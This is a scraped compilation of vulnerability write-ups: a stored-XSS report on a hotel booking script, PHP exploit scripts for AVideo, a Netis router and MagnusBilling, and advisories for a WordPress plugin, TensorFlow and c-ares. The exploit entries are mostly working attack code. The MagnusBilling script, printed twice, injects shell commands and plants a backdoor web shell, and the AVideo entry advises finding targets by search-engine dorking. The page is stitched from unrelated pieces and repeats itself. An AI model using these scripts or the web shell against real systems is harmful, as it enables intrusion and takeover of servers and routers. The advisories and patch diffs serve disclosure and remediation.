GZ Hotel Booking Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-hotel-booking-script.html                     ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Hotel Booking Script 1.8                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZHotelBooking/load.php?controller=GzFront&action=booking_details HTTP/1.1first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&terms=1&date_range=29.06.2023+-+30.06.2023&date_to=30.06.2023&date_from=29.06.2023&adults=1&children=1&order=&sort=&fromNumber=&toNumber=&room_id%5B4%5D=1&room_id%5B3%5D=0&room_id%5B2%5D=0&room_id%5B1%5D=0&adults_arr%5B4%5D%5B1%5D=1&children_arr%5B4%5D%5B1%5D=1-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Room] for Booking2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)      [-] Done

GZ Hotel Booking Script 1.8 Cross Site Scripting

AVideo version 12.4 suffers from a PHP code injection vulnerability.

=============================================================================================================================================| # Title     : AVideo 12.4 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/WWBN/AVideo/tree/master                                                                                  |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 114 set your target.[+] Line 115 set your commands.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass indoushka{    private $target_uri;    private $payload;    public function __construct($target_uri, $payload)    {        $this->target_uri = $target_uri;        $this->payload = $payload;    }    public function exploit()    {        // إعداد الحمولة        $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";        $filter_payload = $this->generatePhpFilterPayload($php_code);        // إرسال الطلب        $data = http_build_query(['systemRootPath' => $filter_payload]);        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);        if ($response['code'] !== 200) {            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";        }    }    public function check()    {        $response = $this->sendRequest('GET', '/index.php');        if (!$response) {            return 'Failed to connect to the target.';        }        if ($response['code'] !== 200) {            return "Unexpected HTTP response code: " . $response['code'];        }        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);        preg_match('//m', $response['body'], $version_match);        if (empty($version_match[1])) {            return 'Unable to extract AVideo version.';        }        $version = $version_match[1];        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');        if ($plugin_check['code'] !== 200) {            return 'Vulnerable plugin WWBNIndex was not detected';        }        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";        }        return "Detected non-vulnerable AVideo version: {$version}";    }    private function sendRequest($method, $uri, $data = null)    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($method === 'POST') {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        $response = curl_exec($ch);        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['code' => $http_code, 'body' => $response];    }    private function isArchPHP()    {        // افترض أن الحمولة عبارة عن كود PHP        return true; // أو تحقق من ذلك بناءً على شروط معينة    }    private function generatePhpFilterPayload($php_code)    {        // يجب أن تضيف هنا منطق إعداد الحمولة (تصفية)        return $php_code; // قم بتعديل ذلك بناءً على متطلباتك    }}// مثال على كيفية الاستخدام:$target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا$payload = "<?php echo 'Hello World!'; ?>"; // الحمولة المراد استخدامها$indoushka = new indoushka($target_uri, $payload);$check_result = $indoushka->check();echo $check_result . "\n";$indoushka->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

AVideo 12.4 Code Injection

Netis MW5360 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Netis MW5360 Code Injection Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.netis-systems.com/products/MW5360.html                                                                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 67 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass NetisRouterExploit {    private $targetUri;    private $cmdDelay;    public function __construct($targetUri = '/', $cmdDelay = 30) {        $this->targetUri = $targetUri;        $this->cmdDelay = $cmdDelay;    }    public function executeCommand($cmd) {        // Clean up payload file if command includes chmod        if (strpos($cmd, 'chmod +x') !== false) {            $this->registerFilesForCleanup(trim(explode('+x', $cmd)[1]));        }        // Skip command removal for payload cleanup        if (strpos($cmd, 'rm -f') === false) {            $payload = base64_encode("`$cmd`");            echo "Executing $cmd\n";            $this->sendRequest('/cgi-bin/skk_set.cgi', [                'password' => $payload,                'quick_set' => 'ap',                'app' => 'wan_set_shortcut'            ]);        }    }    public function check() {        echo "Checking if target can be exploited.\n";        $res = $this->sendRequest('/cgi-bin/skk_get.cgi', [            'mode_name' => 'skk_get',            'wl_link' => 0        ]);        if ($res === false || strpos($res['body'], 'version') === false) {            return "Unknown: No valid response received from target.";        }        preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches);        if (isset($matches[2])) {            $version_number = strtoupper(trim(explode('-V', $matches[2])[1]));            $model_number = strtoupper(trim(explode('-V', $matches[2])[0]));            if (strpos($model_number, '-') !== false) {                $model_number = trim(explode('-', $model_number)[1]);            } else {                $model_number = trim(explode('(', $model_number)[1]);            }            if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) {                return "Appears: Version " . $matches[2];            }            return "Safe: Version " . $matches[2];        }        return "Safe";    }    public function exploit() {        echo "Executing exploit with payload.\n";        $this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]);    }    private function sendRequest($uri, $postData) {        $url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP        $options = [            'http' => [                'header'  => "Content-type: application/x-www-form-urlencoded\r\n",                'method'  => 'POST',                'content' => http_build_query($postData),            ],        ];        $context  = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === FALSE) {            return false;        }        return ['body' => $result];    }    private function registerFilesForCleanup($filename) {        echo "Registering $filename for cleanup.\n";        // Logic to clean up the file after execution.    }    private function executeCmdStager($options) {        echo "Executing command stager with options: " . print_r($options, true) . "\n";        // Implement the command stager logic here    }}// Usage$exploit = new NetisRouterExploit('/');$exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Netis MW5360 Code Injection

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 6.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 6.x Code Injection 

MagnusBilling version 7.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 7.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 7.x Command Injection

The Import / Export Customizer Settings plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the astra_admin_errors() function. This makes it possible for unauthenticated attackers to display an import status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

Timestamp:

08/25/2020 06:56:40 AM (3 years ago)

brainstormworg

Message:

Update to version 1.0.4 from GitHub  

Location:

astra-import-export

Files:

  

*   tags/1.0.4 _(copied from astra-import-export/trunk)_
*   tags/1.0.4/astra-import-export.php (2 diffs)
*   tags/1.0.4/inc/classes/class-astra-import-export-loader.php (1 diff)
*   tags/1.0.4/languages/astra-import-export.pot (1 diff)
*   tags/1.0.4/readme.txt (2 diffs)
*   trunk/astra-import-export.php (2 diffs)
*   trunk/inc/classes/class-astra-import-export-loader.php (1 diff)
*   trunk/languages/astra-import-export.pot (1 diff)
*   trunk/readme.txt (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **astra-import-export/tags/1.0.4/astra-import-export.php**
    
    r2307073
    
    r2368366
    
     
    
    4
    
    4
    
     \* Plugin URI: https://wpastra.com/
    
    5
    
    5
    
     \* Description: This plugin is an add-on for the Astra WordPress Theme. It will help in Import Export Customizer settings.
    
    6
    
     
    
     \* Version: 1.0.3
    
     
    
    6
    
     \* Version: 1.0.4
    
    7
    
    7
    
     \* Author: Brainstorm Force
    
    8
    
    8
    
     \* Author URI: http://www.brainstormforce.com
    
    …
    
    …
    
     
    
    19
    
    19
    
     \* Set constants.
    
    20
    
    20
    
     \*/
    
    21
    
     
    
    define( 'ASTRA\_IMPORT\_EXPORT\_VER', '1.0.3' );
    
     
    
    21
    
    define( 'ASTRA\_IMPORT\_EXPORT\_VER', '1.0.4' );
    
    22
    
    22
    
    define( 'ASTRA\_IMPORT\_EXPORT\_FILE', \_\_FILE\_\_ );
    
    23
    
    23
    
    define( 'ASTRA\_IMPORT\_EXPORT\_BASE', plugin\_basename( ASTRA\_IMPORT\_EXPORT\_FILE ) );
    
*   **astra-import-export/tags/1.0.4/inc/classes/class-astra-import-export-loader.php**
    
    r2307073
    
    r2368366
    
     
    
    103
    
    103
    
            public function astra\_admin\_errors() {
    
    104
    
    104
    
                // Verify correct source for the $\_GET data.
    
    105
    
     
    
                if ( isset( $\_GET\['\_wpnonce'\] ) && ! wp\_verify\_nonce( $\_GET\['\_wpnonce'\], 'astra-import-complete' ) ) {
    
     
    
    105
    
                if ( ! isset( $\_GET\['\_wpnonce'\] ) || ! wp\_verify\_nonce( $\_GET\['\_wpnonce'\], 'astra-import-complete' ) ) {
    
    106
    
    106
    
                    return;
    
    107
    
    107
    
                }
    
*   **astra-import-export/tags/1.0.4/languages/astra-import-export.pot**
    
    r2307073
    
    r2368366
    
     
    
    3
    
    3
    
    msgid ""
    
    4
    
    4
    
    msgstr ""
    
    5
    
     
    
    "Project-Id-Version: Import / Export Customizer Settings 1.0.3\\n"
    
     
    
    5
    
    "Project-Id-Version: Import / Export Customizer Settings 1.0.4\\n"
    
    6
    
    6
    
    "Report-Msgid-Bugs-To: "
    
    7
    
    7
    
    "https://wordpress.org/support/plugin/astra-import-export\\n"
    
    8
    
     
    
    "POT-Creation-Date: 2020-05-18 07:08:21+00:00\\n"
    
     
    
    8
    
    "POT-Creation-Date: 2020-08-25 06:06:31+00:00\\n"
    
    9
    
    9
    
    "MIME-Version: 1.0\\n"
    
    10
    
    10
    
    "Content-Type: text/plain; charset=utf-8\\n"
    
*   **astra-import-export/tags/1.0.4/readme.txt**
    
    r2359689
    
    r2368366
    
     
    
    4
    
    4
    
    Requires at least: 4.4
    
    5
    
    5
    
    Tags: astra addons export, import, settings, customizer settings, theme settings, theme options
    
    6
    
     
    
    Stable tag: 1.0.3
    
     
    
    6
    
    Stable tag: 1.0.4
    
    7
    
    7
    
    Requires PHP: 5.4
    
    8
    
    8
    
    Tested up to: 5.5
    
    …
    
    …
    
     
    
    43
    
    43
    
    \== Changelog ==
    
    44
    
    44
    
     
    
    45
    
    \= 1.0.4 =
    
     
    
    46
    
    \- Fix: Security hardening.
    
     
    
    47
    
    45
    
    48
    
    \= 1.0.3 =
    
    46
    
    49
    
    \- Improvement: Compatibility with latest WordPress PHP\_CodeSniffer rules.
    
*   **astra-import-export/trunk/astra-import-export.php**
    
    r2307073
    
    r2368366
    
     
    
    4
    
    4
    
     \* Plugin URI: https://wpastra.com/
    
    5
    
    5
    
     \* Description: This plugin is an add-on for the Astra WordPress Theme. It will help in Import Export Customizer settings.
    
    6
    
     
    
     \* Version: 1.0.3
    
     
    
    6
    
     \* Version: 1.0.4
    
    7
    
    7
    
     \* Author: Brainstorm Force
    
    8
    
    8
    
     \* Author URI: http://www.brainstormforce.com
    
    …
    
    …
    
     
    
    19
    
    19
    
     \* Set constants.
    
    20
    
    20
    
     \*/
    
    21
    
     
    
    define( 'ASTRA\_IMPORT\_EXPORT\_VER', '1.0.3' );
    
     
    
    21
    
    define( 'ASTRA\_IMPORT\_EXPORT\_VER', '1.0.4' );
    
    22
    
    22
    
    define( 'ASTRA\_IMPORT\_EXPORT\_FILE', \_\_FILE\_\_ );
    
    23
    
    23
    
    define( 'ASTRA\_IMPORT\_EXPORT\_BASE', plugin\_basename( ASTRA\_IMPORT\_EXPORT\_FILE ) );
    
*   **astra-import-export/trunk/inc/classes/class-astra-import-export-loader.php**
    
    r2307073
    
    r2368366
    
     
    
    103
    
    103
    
            public function astra\_admin\_errors() {
    
    104
    
    104
    
                // Verify correct source for the $\_GET data.
    
    105
    
     
    
                if ( isset( $\_GET\['\_wpnonce'\] ) && ! wp\_verify\_nonce( $\_GET\['\_wpnonce'\], 'astra-import-complete' ) ) {
    
     
    
    105
    
                if ( ! isset( $\_GET\['\_wpnonce'\] ) || ! wp\_verify\_nonce( $\_GET\['\_wpnonce'\], 'astra-import-complete' ) ) {
    
    106
    
    106
    
                    return;
    
    107
    
    107
    
                }
    
*   **astra-import-export/trunk/languages/astra-import-export.pot**
    
    r2307073
    
    r2368366
    
     
    
    3
    
    3
    
    msgid ""
    
    4
    
    4
    
    msgstr ""
    
    5
    
     
    
    "Project-Id-Version: Import / Export Customizer Settings 1.0.3\\n"
    
     
    
    5
    
    "Project-Id-Version: Import / Export Customizer Settings 1.0.4\\n"
    
    6
    
    6
    
    "Report-Msgid-Bugs-To: "
    
    7
    
    7
    
    "https://wordpress.org/support/plugin/astra-import-export\\n"
    
    8
    
     
    
    "POT-Creation-Date: 2020-05-18 07:08:21+00:00\\n"
    
     
    
    8
    
    "POT-Creation-Date: 2020-08-25 06:06:31+00:00\\n"
    
    9
    
    9
    
    "MIME-Version: 1.0\\n"
    
    10
    
    10
    
    "Content-Type: text/plain; charset=utf-8\\n"
    
*   **astra-import-export/trunk/readme.txt**
    
    r2359689
    
    r2368366
    
     
    
    4
    
    4
    
    Requires at least: 4.4
    
    5
    
    5
    
    Tags: astra addons export, import, settings, customizer settings, theme settings, theme options
    
    6
    
     
    
    Stable tag: 1.0.3
    
     
    
    6
    
    Stable tag: 1.0.4
    
    7
    
    7
    
    Requires PHP: 5.4
    
    8
    
    8
    
    Tested up to: 5.5
    
    …
    
    …
    
     
    
    43
    
    43
    
    \== Changelog ==
    
    44
    
    44
    
     
    
    45
    
    \= 1.0.4 =
    
     
    
    46
    
    \- Fix: Security hardening.
    
     
    
    47
    
    45
    
    48
    
    \= 1.0.3 =
    
    46
    
    49
    
    \- Improvement: Compatibility with latest WordPress PHP\_CodeSniffer rules.
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2020-36737: Changeset 2368366 for astra-import-export – WordPress Plugin Repository

TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, there is a potential for segfault / denial of service in TensorFlow by calling `tf.compat.v1.*` ops which don't yet have support for quantized types, which was added after migration to TensorFlow 2.x. In these scenarios, since the kernel is missing, a `nullptr` value is passed to `ParseDimensionValue` for the `py_value` argument. Then, this is dereferenced, resulting in segfault. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.

**Impact**

There is a potential for segfault / denial of service in TensorFlow by calling tf.compat.v1.* ops which don't yet have support for quantized types (added after migration to TF 2.x):

import numpy as np
import tensorflow as tf

tf.compat.v1.placeholder\_with\_default(input\=np.array(\[2\]),shape\=tf.constant(dtype\=tf.qint8, value\=np.array(\[1\])))

In these scenarios, since the kernel is missing, a nullptr value is passed to ParseDimensionValue for the py_value argument. Then, this is dereferenced, resulting in segfault.

**Patches**

We have patched the issue in GitHub commit 237822b59fc504dda2c564787f5d3ad9c4aa62d9.

The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

**For more information**

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

**Attribution**

This vulnerability has been reported by Hong Jin from Singapore Management University.

CVE-2022-29205

A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.

Project c-ares Security Advisory, August 10, 2021 - Permalink

**VULNERABILITY**

Missing input validation of host names returned by Domain Name Servers in the c-ares library can lead to output of wrong hostnames (leading to Domain Hijacking).

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2021-3672 to this issue.

**STEPS TO REPRODUCE**

An example domain which has a cname including a zero byte:

\`\`\` $ adig cnamezero.test2.xdi-attack.net

Answers: cnamezero.test2.xdi-attack.net. 0 CNAME victim.test2.xdi-attack.net\\000.test2.xdi-attack.net. victim.test2.xdi-attack.net\\000.test2.xdi-attack.net. 0 A 141.12.174.88 \`\`\`

When resolved via a vulnerable implementation, the CNAME alias and name of the A record will seem to be `victim.test2.xdi-attack.net` instead of `victim.test2.xdi-attack.net\000.test2.xdi-attack.net`, a totally different domain.

This is a clear error in zero-byte handling and can potentially lead to DNS-cache injections in case an application implements a cache based on the library.

**AFFECTED VERSIONS**

This flaw exists in the following c-ares versions.

*   Affected versions: c-ares 1.0.0 to and including 1.17.1
*   Not affected versions: c-ares >= 1.17.2

**THE SOLUTION**

In version 1.17.2, the function has been corrected and a test case have been added to verify.

A patch for CVE-2021-3672 is available.

**RECOMMENDATIONS**

We suggest you take one of the following actions immediately, in order of preference:

A - Upgrade c-ares to version 1.17.2

B - Apply the patch to your version and rebuild

**TIME LINE**

It was reported to the c-ares project on June 11, 2021 by Philipp Jeitner and Haya Shulman, Fraunhofer SIT.

c-ares 1.17.2 was released on August 10 2021, coordinated with the publication of this advisory.

**CREDITS**

Thanks to Philipp Jeitner and Haya Shulman, Fraunhofer SIT for the report.

CVE-2021-3672: Missing input validation on hostnames returned by DNS servers

Project c-ares Security Advisory, August 10, 2021 - Permalink

**VULNERABILITY**

Missing input validation of host names returned by Domain Name Servers in the c-ares library can lead to output of wrong hostnames (leading to Domain Hijacking).

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2021-3672 to this issue.

**STEPS TO REPRODUCE**

An example domain which has a cname including a zero byte:

\`\`\` $ adig cnamezero.test2.xdi-attack.net

Answers: cnamezero.test2.xdi-attack.net. 0 CNAME victim.test2.xdi-attack.net\\000.test2.xdi-attack.net. victim.test2.xdi-attack.net\\000.test2.xdi-attack.net. 0 A 141.12.174.88 \`\`\`

When resolved via a vulnerable implementation, the CNAME alias and name of the A record will seem to be victim.test2.xdi-attack.net instead of victim.test2.xdi-attack.net\000.test2.xdi-attack.net, a totally different domain.

This is a clear error in zero-byte handling and can potentially lead to DNS-cache injections in case an application implements a cache based on the library.

**AFFECTED VERSIONS**

This flaw exists in the following c-ares versions.

*   Affected versions: c-ares 1.0.0 to and including 1.17.1
*   Not affected versions: c-ares >= 1.17.2

**THE SOLUTION**

In version 1.17.2, the function has been corrected and a test case have been added to verify.

A patch for CVE-2021-3672 is available.

**RECOMMENDATIONS**

We suggest you take one of the following actions immediately, in order of preference:

A - Upgrade c-ares to version 1.17.2

B - Apply the patch to your version and rebuild

**TIME LINE**

It was reported to the c-ares project on June 11, 2021 by Philipp Jeitner and Haya Shulman, Fraunhofer SIT.

c-ares 1.17.2 was released on August 10 2021, coordinated with the publication of this advisory.

**CREDITS**

Thanks to Philipp Jeitner and Haya Shulman, Fraunhofer SIT for the report.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us